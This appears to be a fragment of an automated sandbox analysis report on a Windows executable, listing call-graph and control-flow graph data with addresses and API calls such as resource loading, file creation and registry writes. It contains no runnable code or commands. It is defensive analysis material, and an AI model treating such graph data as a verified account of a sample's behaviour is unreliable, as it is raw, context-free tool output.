SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3292->3295 3296 7ff7e74f5aca 3297 7ff7e74f5ad0 GlobalFree 3296->3297 3298 7ff7e74f5a9e 3296->3298 3299 7ff7e74f8400 __getmainargs 3300 7ff7e74f397e 3301 7ff7e74f3992 3300->3301 3302 7ff7e74f399a 3300->3302 3301->3302 3304 7ff7e74f39ce GetDesktopWindow 3301->3304 3303 7ff7e74f3a2c EndDialog 3302->3303 3305 7ff7e74f399f 3302->3305 3303->3305 3306 7ff7e74f4dc8 14 API calls 3304->3306 3307 7ff7e74f39e5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3306->3307 3307->3305 3308 7ff7e74f5f7e 3309 7ff7e74f5f9b FindResourceA LoadResource LockResource 3308->3309 3310 7ff7e74f51f8 7 API calls 3308->3310 3311 7ff7e74f5fec 3309->3311 3325 7ff7e74f61bf 3309->3325 3310->3309 3312 7ff7e74f6046 3311->3312 3313 7ff7e74f5ff8 GetDlgItem ShowWindow GetDlgItem ShowWindow 3311->3313 3314 7ff7e74f5e44 33 API calls 3312->3314 3313->3312 3315 7ff7e74f604b 3314->3315 3316 7ff7e74f604f 3315->3316 3317 7ff7e74f6059 #20 3315->3317 3321 7ff7e74f4f2c 24 API calls 3316->3321 3317->3316 3318 7ff7e74f60c1 #22 3317->3318 3319 7ff7e74f6143 3318->3319 3320 7ff7e74f6105 #23 3318->3320 3322 7ff7e74f6165 3319->3322 3323 7ff7e74f6151 FreeResource 3319->3323 3320->3316 3320->3319 3321->3319 3324 7ff7e74f618f 3322->3324 3326 7ff7e74f4f2c 24 API calls 3322->3326 3323->3322 3324->3325 3327 7ff7e74f61a1 SendMessageA 3324->3327 3326->3324 3327->3325 3328 7ff7e74f4b3b SendMessageA 3329 7ff7e74f55ba 3330 7ff7e74f55be 3329->3330 3331 7ff7e74f557c 3329->3331 3332 7ff7e74f5610 3330->3332 3333 7ff7e74f563d lstrcmpA 3330->3333 3334 7ff7e74f4f2c 24 API calls 3332->3334 3335 7ff7e74f5634 3333->3335 3336 7ff7e74f5694 3333->3336 3334->3335 3336->3335 3337 7ff7e74f56e8 CreateFileA 3336->3337 3337->3335 3339 7ff7e74f571e 3337->3339 3338 7ff7e74f57a1 CreateFileA 3338->3335 3339->3335 3339->3338 3340 7ff7e74f5789 CharNextA 3339->3340 3341 7ff7e74f5772 CreateDirectoryA 3339->3341 3340->3339 3341->3340

                                                                                                                  Callgraph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  • Opacity -> Relevance
                                                                                                                  • Disassembly available
                                                                                                                  callgraph 0 Function_00007FF7E74F2D70 26 Function_00007FF7E74F4F2C 0->26 51 Function_00007FF7E74F1BF4 0->51 58 Function_00007FF7E74F63DC 0->58 59 Function_00007FF7E74F2EDC 0->59 62 Function_00007FF7E74F3214 0->62 98 Function_00007FF7E74F23C0 0->98 1 Function_00007FF7E74F4B70 1->26 2 Function_00007FF7E74F146E 53 Function_00007FF7E74F86F0 2->53 95 Function_00007FF7E74F4DC8 2->95 3 Function_00007FF7E74F366E 3->1 3->26 61 Function_00007FF7E74F6F14 3->61 67 Function_00007FF7E74F7E08 3->67 84 Function_00007FF7E74F6D9C 3->84 3->95 4 Function_00007FF7E74F4064 9 Function_00007FF7E74F7958 4->9 4->26 27 Function_00007FF7E74F7D28 4->27 74 Function_00007FF7E74F51F8 4->74 5 Function_00007FF7E74F8B60 63 Function_00007FF7E74F8B10 5->63 96 Function_00007FF7E74F8BC0 5->96 6 Function_00007FF7E74F8460 6->0 6->5 49 Function_00007FF7E74F8BF4 6->49 7 Function_00007FF7E74F845E 7->0 7->5 8 Function_00007FF7E74F1258 25 Function_00007FF7E74F1130 8->25 8->53 10 Function_00007FF7E74F1558 43 Function_00007FF7E74F7F48 10->43 11 Function_00007FF7E74F6294 11->9 11->26 11->74 12 Function_00007FF7E74F8A92 13 Function_00007FF7E74F2490 13->26 13->53 14 Function_00007FF7E74F868E 15 Function_00007FF7E74F8084 16 Function_00007FF7E74F7984 16->53 100 Function_00007FF7E74F10BC 16->100 17 Function_00007FF7E74F5F80 17->26 45 Function_00007FF7E74F5E44 17->45 17->74 18 Function_00007FF7E74F3C80 19 Function_00007FF7E74F397E 19->95 20 Function_00007FF7E74F5F7E 20->26 20->45 20->74 21 Function_00007FF7E74F5478 21->26 22 Function_00007FF7E74F2034 22->22 22->53 22->67 68 Function_00007FF7E74F1008 22->68 23 Function_00007FF7E74F2234 23->53 23->67 24 Function_00007FF7E74F3D34 24->15 24->26 36 Function_00007FF7E74F8154 24->36 24->53 86 Function_00007FF7E74F2898 24->86 25->53 26->15 26->36 26->53 26->100 27->26 28 Function_00007FF7E74F8E20 29 Function_00007FF7E74F5820 30 Function_00007FF7E74F7320 30->43 30->53 30->67 85 Function_00007FF7E74F729C 30->85 94 Function_00007FF7E74F88C8 30->94 99 Function_00007FF7E74F1BC0 30->99 103 Function_00007FF7E74F7FB8 30->103 31 Function_00007FF7E74F2520 31->26 31->53 31->100 32 Function_00007FF7E74F831E 71 Function_00007FF7E74F8B00 32->71 80 Function_00007FF7E74F8AA8 32->80 33 Function_00007FF7E74F8A1E 34 Function_00007FF7E74F351E 34->95 35 Function_00007FF7E74F5A1E 36->53 37 Function_00007FF7E74F4A54 37->26 37->74 38 Function_00007FF7E74F7C50 38->53 38->67 39 Function_00007FF7E74F3A4E 39->18 39->26 39->95 40 Function_00007FF7E74F8A4C 41 Function_00007FF7E74F874B 60 Function_00007FF7E74F8714 41->60 42 Function_00007FF7E74F8049 44 Function_00007FF7E74F2644 44->53 44->67 45->53 77 Function_00007FF7E74F59B0 45->77 97 Function_00007FF7E74F55C0 45->97 46 Function_00007FF7E74F4B3B 47 Function_00007FF7E74F8D3C 48 Function_00007FF7E74F4838 48->9 48->26 48->53 48->98 50 Function_00007FF7E74F15F4 50->10 50->26 50->53 57 Function_00007FF7E74F2AE8 50->57 50->67 50->68 50->100 50->103 51->26 51->53 52 Function_00007FF7E74F5AF1 52->21 52->53 73 Function_00007FF7E74F5CFC 52->73 52->77 88 Function_00007FF7E74F52D4 52->88 52->97 102 Function_00007FF7E74F53B8 52->102 53->60 54 Function_00007FF7E74F8DF0 55 Function_00007FF7E74F68F0 55->9 55->13 55->26 55->27 55->53 55->61 66 Function_00007FF7E74F6710 55->66 55->67 55->74 56 Function_00007FF7E74F5AEA 57->53 83 Function_00007FF7E74F7EA0 57->83 58->22 58->53 58->83 59->8 59->22 59->24 59->26 59->27 59->30 59->53 59->74 61->9 61->26 61->31 61->53 62->4 62->9 62->11 62->16 62->17 62->26 62->27 62->37 62->53 62->55 62->61 62->67 75 Function_00007FF7E74F41B4 62->75 87 Function_00007FF7E74F61D4 62->87 62->98 64 Function_00007FF7E74F7B0F 64->53 64->67 65 Function_00007FF7E74F1D10 65->26 65->53 65->67 65->100 66->9 66->53 66->61 66->67 81 Function_00007FF7E74F65A8 66->81 66->84 67->68 69 Function_00007FF7E74F2308 70 Function_00007FF7E74F8D02 70->47 72 Function_00007FF7E74F8400 75->9 75->26 75->38 75->48 75->50 75->53 75->65 75->67 75->74 75->100 76 Function_00007FF7E74F7AAF 78 Function_00007FF7E74F5AAE 79 Function_00007FF7E74F59A9 80->40 81->53 81->67 81->100 82 Function_00007FF7E74F8BA0 84->9 84->26 84->67 86->44 87->16 87->26 87->74 88->68 89 Function_00007FF7E74F58D0 89->18 90 Function_00007FF7E74F89CE 91 Function_00007FF7E74F34CE 92 Function_00007FF7E74F8CCA 93 Function_00007FF7E74F5ACA 94->60 95->53 97->26 98->23 98->69 99->26 101 Function_00007FF7E74F55BA 101->26 102->27

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FF7E74F41B4 Relevance: 54.6, APIs: 17, Strings: 14, Instructions: 372libraryloaderCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 0 7ff7e74f41b4-7ff7e74f4206 1 7ff7e74f4229-7ff7e74f4231 0->1 2 7ff7e74f4208-7ff7e74f4223 call 7ff7e74f51f8 0->2 3 7ff7e74f4235-7ff7e74f4257 memset 1->3 2->1 10 7ff7e74f434a-7ff7e74f4373 call 7ff7e74f4f2c 2->10 5 7ff7e74f425d-7ff7e74f4278 call 7ff7e74f51f8 3->5 6 7ff7e74f4378-7ff7e74f438b 3->6 5->10 17 7ff7e74f427e-7ff7e74f4284 5->17 9 7ff7e74f438f-7ff7e74f4399 6->9 13 7ff7e74f43ad-7ff7e74f43b8 9->13 14 7ff7e74f439b-7ff7e74f43a1 9->14 23 7ff7e74f45e9 10->23 16 7ff7e74f43bb-7ff7e74f43be 13->16 14->13 15 7ff7e74f43a3-7ff7e74f43ab 14->15 15->9 15->13 19 7ff7e74f43c0-7ff7e74f43d8 call 7ff7e74f51f8 16->19 20 7ff7e74f441e-7ff7e74f4433 call 7ff7e74f15f4 16->20 21 7ff7e74f4286-7ff7e74f428b 17->21 22 7ff7e74f428d-7ff7e74f4290 17->22 19->10 36 7ff7e74f43de-7ff7e74f43e5 19->36 20->23 37 7ff7e74f4439-7ff7e74f4440 20->37 25 7ff7e74f42a5 21->25 26 7ff7e74f4292-7ff7e74f429b 22->26 27 7ff7e74f429d-7ff7e74f429f 22->27 29 7ff7e74f45eb-7ff7e74f461a call 7ff7e74f86f0 23->29 33 7ff7e74f42a8-7ff7e74f42ab 25->33 26->25 32 7ff7e74f42a1 27->32 27->33 32->25 33->16 38 7ff7e74f42b1-7ff7e74f42bb 33->38 39 7ff7e74f46d3-7ff7e74f46da 36->39 40 7ff7e74f43eb-7ff7e74f4418 CompareStringA 36->40 41 7ff7e74f4442-7ff7e74f4449 37->41 42 7ff7e74f4460-7ff7e74f4462 37->42 43 7ff7e74f42bd-7ff7e74f42c0 38->43 44 7ff7e74f4327-7ff7e74f432a 38->44 51 7ff7e74f46e0-7ff7e74f46e7 39->51 52 7ff7e74f4828-7ff7e74f482a 39->52 40->20 40->39 41->42 48 7ff7e74f444b-7ff7e74f4452 41->48 45 7ff7e74f4593-7ff7e74f459f call 7ff7e74f4838 42->45 46 7ff7e74f4468-7ff7e74f446f 42->46 49 7ff7e74f42c2-7ff7e74f42c9 43->49 50 7ff7e74f42cb-7ff7e74f42cd 43->50 44->20 47 7ff7e74f4330-7ff7e74f4348 call 7ff7e74f51f8 44->47 64 7ff7e74f45a4-7ff7e74f45a6 45->64 55 7ff7e74f4475-7ff7e74f4477 46->55 56 7ff7e74f4694-7ff7e74f46ce call 7ff7e74f4f2c LocalFree 46->56 47->10 47->16 48->42 59 7ff7e74f4454-7ff7e74f4456 48->59 60 7ff7e74f42da-7ff7e74f42eb call 7ff7e74f51f8 49->60 50->23 53 7ff7e74f42d3 50->53 51->52 54 7ff7e74f46ed-7ff7e74f471c RegOpenKeyExA 51->54 52->29 53->60 54->52 61 7ff7e74f4722-7ff7e74f4761 RegQueryValueExA 54->61 55->45 63 7ff7e74f447d-7ff7e74f4484 55->63 56->23 59->46 67 7ff7e74f4458-7ff7e74f445b call 7ff7e74f1d10 59->67 60->10 78 7ff7e74f42ed-7ff7e74f431d CompareStringA 60->78 69 7ff7e74f4817-7ff7e74f4823 RegCloseKey 61->69 70 7ff7e74f4767-7ff7e74f4796 memset GetSystemDirectoryA 61->70 63->45 72 7ff7e74f448a-7ff7e74f4495 call 7ff7e74f7c50 63->72 73 7ff7e74f45da-7ff7e74f45e4 LocalFree 64->73 74 7ff7e74f45a8-7ff7e74f45be LocalFree 64->74 67->42 69->52 76 7ff7e74f47ae-7ff7e74f47d7 call 7ff7e74f10bc 70->76 77 7ff7e74f4798-7ff7e74f47a9 call 7ff7e74f7e08 70->77 86 7ff7e74f466f-7ff7e74f4692 call 7ff7e74f4f2c 72->86 87 7ff7e74f449b-7ff7e74f44b7 GetProcAddress 72->87 73->23 74->39 80 7ff7e74f45c4-7ff7e74f45c9 74->80 88 7ff7e74f47de-7ff7e74f47e5 76->88 77->76 78->44 82 7ff7e74f431f-7ff7e74f4322 78->82 80->3 82->20 98 7ff7e74f464e-7ff7e74f466a LocalFree call 7ff7e74f7958 86->98 90 7ff7e74f44bd-7ff7e74f450b 87->90 91 7ff7e74f461c-7ff7e74f4649 call 7ff7e74f4f2c FreeLibrary 87->91 88->88 93 7ff7e74f47e7-7ff7e74f4812 RegSetValueExA 88->93 95 7ff7e74f4515-7ff7e74f451d 90->95 96 7ff7e74f450d-7ff7e74f4511 90->96 91->98 93->69 99 7ff7e74f451f-7ff7e74f4523 95->99 100 7ff7e74f4527-7ff7e74f4529 95->100 96->95 98->23 99->100 102 7ff7e74f4533-7ff7e74f453b 100->102 103 7ff7e74f452b-7ff7e74f452f 100->103 104 7ff7e74f4545-7ff7e74f4547 102->104 105 7ff7e74f453d-7ff7e74f4541 102->105 103->102 107 7ff7e74f4551-7ff7e74f457e 104->107 108 7ff7e74f4549-7ff7e74f454d 104->108 105->104 110 7ff7e74f4580-7ff7e74f4591 FreeLibrary 107->110 111 7ff7e74f45ce-7ff7e74f45d5 FreeLibrary 107->111 108->107 110->74 111->73
                                                                                                                  APIs